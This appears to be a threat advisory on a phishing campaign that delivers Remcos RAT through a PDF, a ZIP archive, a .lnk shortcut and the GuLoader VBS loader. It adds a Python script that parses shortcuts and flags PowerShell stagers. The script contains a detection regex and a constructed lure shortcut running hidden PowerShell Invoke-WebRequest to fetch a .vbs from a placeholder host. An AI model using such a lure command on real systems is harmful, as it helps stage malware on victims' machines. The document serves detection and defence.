Chinese Threat Actors Leverage Phishing and GuLoader to Distribute Remcos RAT


Summary

The campaign delivers a malicious PDF file as a phishing email attachment. The PDF redirects victims to a legitimate cloud-based platform, where they are prompted to download a ZIP archive. Inside the archive is a Windows shortcut (.lnk) file which, when executed, uses PowerShell to download a heavily obfuscated VBS script known as GuLoader.
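One way to triage the ZIP-and-shortcut stage described above, as an added example that is not part of the advisory: parse each Windows shortcut (.lnk) inside the archive according to the MS-SHLLINK layout and flag any whose target path or arguments invoke PowerShell or download a script. The archive, member names and URL below are constructed for the demonstration.

```python
import io, re, struct, zipfile

# MS-SHLLINK LinkFlags that decide which optional sections follow the 76-byte header
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_DATA = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
               (0x20, "arguments"), (0x40, "icon_location")]
SUSPICIOUS = re.compile(r"powershell|pwsh|-enc|hidden|invoke-webrequest|downloadstring|\.vbs", re.I)  # stager indicators

def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields (target path, arguments, ...) of a .lnk file."""
    if struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a shell link file")
    flags, pos = struct.unpack_from("<I", data, 20)[0], 0x4C
    if flags & HAS_ID_LIST:      # skip LinkTargetIDList: 2-byte size + items
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:    # skip LinkInfo: 4-byte size includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields, width = {}, 2 if flags & IS_UNICODE else 1
    for flag, name in STRING_DATA:
        if flags & flag:
            count = struct.unpack_from("<H", data, pos)[0] * width
            raw = data[pos + 2:pos + 2 + count]
            fields[name] = raw.decode("utf-16-le" if width == 2 else "latin-1")
            pos += 2 + count
    return fields

def triage_zip(zip_bytes: bytes) -> list:
    """List (member, command line) for every shortcut that looks like a PowerShell stager."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if name.lower().endswith(".lnk"):
                f = parse_lnk(zf.read(name))
                cmd = (f.get("relative_path", "") + " " + f.get("arguments", "")).strip()
                if SUSPICIOUS.search(cmd):
                    findings.append((name, cmd))
    return findings

def sample_archive() -> bytes:
    """Constructed lure archive: one .lnk (RelativePath + Arguments, Unicode) plus a benign file."""
    clsid = bytes.fromhex("0114020000000000c000000000000046")
    header = struct.pack("<I", 0x4C) + clsid + struct.pack("<I", 0x08 | 0x20 | IS_UNICODE) + bytes(52)
    strings = (r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
               r'-WindowStyle Hidden -Command "Invoke-WebRequest https://cloud.example.invalid/doc.vbs -OutFile doc.vbs"')
    lnk = header + b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in strings)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Invoice.pdf.lnk", lnk)
        zf.writestr("readme.txt", "constructed benign member")
    return buf.getvalue()
```

Shortcuts carrying a LinkTargetIDList or LinkInfo block are handled by skipping those sections, so the parser works on real attachments as well as the constructed one.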